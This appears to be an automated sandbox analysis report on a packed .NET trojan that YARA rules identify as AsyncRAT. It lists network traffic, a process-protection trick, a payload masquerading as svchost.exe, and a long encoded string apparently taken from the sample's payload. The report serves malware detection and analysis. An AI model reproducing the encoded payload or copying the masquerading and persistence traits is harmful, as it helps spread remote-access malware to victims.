              Source: powershell.exe, 00000007.00000002.2468881268.00000000077C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.verisign.
              Source: unknownNetwork traffic detected: HTTP traffic on port 60684 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60678 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60690 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60650
              Source: unknownNetwork traffic detected: HTTP traffic on port 60735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60659
              Source: unknownNetwork traffic detected: HTTP traffic on port 60712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60658
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60656
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60654
              Source: unknownNetwork traffic detected: HTTP traffic on port 60650 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60664
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60669
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60668
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60667
              Source: unknownNetwork traffic detected: HTTP traffic on port 60753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60609 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60615 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60675
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60674
              Source: unknownNetwork traffic detected: HTTP traffic on port 60672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60672
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60671
              Source: unknownNetwork traffic detected: HTTP traffic on port 60700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60678
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60676
              Source: unknownNetwork traffic detected: HTTP traffic on port 60717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60686
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60685
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60684
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60682
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60681
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60680
              Source: unknownNetwork traffic detected: HTTP traffic on port 60759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60689
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60688
              Source: unknownNetwork traffic detected: HTTP traffic on port 60621 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60659 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60619
              Source: unknownNetwork traffic detected: HTTP traffic on port 60688 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60636 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60730
              Source: unknownNetwork traffic detected: HTTP traffic on port 60731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60697 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60616
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60615
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60612
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60731
              Source: unknownNetwork traffic detected: HTTP traffic on port 60742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60629
              Source: unknownNetwork traffic detected: HTTP traffic on port 60654 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60740
              Source: unknownNetwork traffic detected: HTTP traffic on port 60671 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60692 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60626
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60624
              Source: unknownNetwork traffic detected: HTTP traffic on port 60719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60744
              Source: unknownNetwork traffic detected: HTTP traffic on port 60757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60621
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60742
              Source: unknownNetwork traffic detected: HTTP traffic on port 60682 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60676 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60631
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60751
              Source: unknownNetwork traffic detected: HTTP traffic on port 60619 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60638
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60636
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60633
              Source: unknownNetwork traffic detected: HTTP traffic on port 60718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60753
              Source: unknownNetwork traffic detected: HTTP traffic on port 60608 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60631 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60641
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60761
              Source: unknownNetwork traffic detected: HTTP traffic on port 60730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60760
              Source: unknownNetwork traffic detected: HTTP traffic on port 60698 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60646
              Source: unknownNetwork traffic detected: HTTP traffic on port 60749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60693 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60664 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60641 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60658 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60681 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60706
              Source: unknownNetwork traffic detected: HTTP traffic on port 60675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60612 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60669 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60702
              Source: unknownNetwork traffic detected: HTTP traffic on port 60732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60700
              Source: unknownNetwork traffic detected: HTTP traffic on port 60606 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60718
              Source: unknownNetwork traffic detected: HTTP traffic on port 60686 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60717
              Source: unknownNetwork traffic detected: HTTP traffic on port 60743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60716
              Source: unknownNetwork traffic detected: HTTP traffic on port 60699 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60713
              Source: unknownNetwork traffic detected: HTTP traffic on port 60624 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60710
              Source: unknownNetwork traffic detected: HTTP traffic on port 60737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60609
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60608
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60728
              Source: unknownNetwork traffic detected: HTTP traffic on port 60748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60646 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60694 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60606
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60605
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60725
              Source: unknownNetwork traffic detected: HTTP traffic on port 60629 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60722
              Source: unknownNetwork traffic detected: HTTP traffic on port 60751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60720
              Source: unknownNetwork traffic detected: HTTP traffic on port 60716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60680 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60697
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60695
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60694
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60693
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60692
              Source: unknownNetwork traffic detected: HTTP traffic on port 60674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60668 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60690
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60699
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60698
              Source: unknownNetwork traffic detected: HTTP traffic on port 60754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60633 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60685 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60616 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60689 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60695 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60605 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60656 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60667 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60738 -> 443
              Source: unknownHTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.6:60605 version: TLS 1.2

              Operating System Destruction

              barindex
              Protects its processes via BreakOnTermination flag
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeProcess information set: 01 00 00 00 Jump to behavior

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 20.2.svchost.exe.19f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 20.2.svchost.exe.19f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 20.2.svchost.exe.391c344.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 20.2.svchost.exe.39471b0.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 20.2.svchost.exe.39471b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 20.2.svchost.exe.391c344.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000014.00000002.2656202645.000000000391C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000014.00000002.2656202645.0000000003947000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000014.00000002.2655969773.00000000019F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000014.00000002.2656202645.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              .NET source code contains very large strings
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, Abacate.csLong String: Length: 60417
              Source: svchost.exe.0.dr, Abacate.csLong String: Length: 60417
              Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe.3a0ddd0.0.raw.unpack, Abacate.csLong String: Length: 60417
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeCode function: 0_2_028923C80_2_028923C8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeCode function: 0_2_0289B7B00_2_0289B7B0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeCode function: 0_2_0289571F0_2_0289571F
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeCode function: 0_2_02890AC10_2_02890AC1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeCode function: 0_2_028908480_2_02890848
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeCode function: 0_2_0289AEE00_2_0289AEE0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeCode function: 0_2_02895D180_2_02895D18
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeCode function: 0_2_02892A680_2_02892A68
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeCode function: 0_2_0289AB980_2_0289AB98
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0496B4902_2_0496B490
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08943E982_2_08943E98
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04A2B4905_2_04A2B490
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08A13A985_2_08A13A98
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04A7B4A07_2_04A7B4A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04A7B4907_2_04A7B490
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_04CDB49811_2_04CDB498
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_04CDB48811_2_04CDB488
              Source: C:\Users\user\AppData\Local\svchost.exeCode function: 20_2_019C084820_2_019C0848
              Source: C:\Users\user\AppData\Local\svchost.exeCode function: 20_2_019C23C820_2_019C23C8
              Source: C:\Users\user\AppData\Local\svchost.exeCode function: 20_2_019C0AC120_2_019C0AC1
              Source: C:\Users\user\AppData\Local\svchost.exeCode function: 21_2_057C084821_2_057C0848
              Source: C:\Users\user\AppData\Local\svchost.exeCode function: 21_2_057C23C821_2_057C23C8
              Source: C:\Users\user\AppData\Local\svchost.exeCode function: 21_2_057C0AC121_2_057C0AC1
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1436 -ip 1436
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeStatic PE information: invalid certificate
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4322320081.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4303041565.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000000.2324139818.0000000000722000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeBinary or memory string: OriginalFilenamesvchost.exej% vs SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
              Source: 20.2.svchost.exe.19f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 20.2.svchost.exe.19f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 20.2.svchost.exe.391c344.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 20.2.svchost.exe.39471b0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 20.2.svchost.exe.39471b0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 20.2.svchost.exe.391c344.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000014.00000002.2656202645.000000000391C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000014.00000002.2656202645.0000000003947000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000014.00000002.2655969773.00000000019F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000014.00000002.2656202645.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 20.2.svchost.exe.391c344.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 20.2.svchost.exe.391c344.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 20.2.svchost.exe.391c344.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 20.2.svchost.exe.39471b0.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 20.2.svchost.exe.39471b0.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 20.2.svchost.exe.39471b0.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 20.2.svchost.exe.19f0000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 20.2.svchost.exe.19f0000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 20.2.svchost.exe.19f0000.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, Abacate.csBase64 encoded string: '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
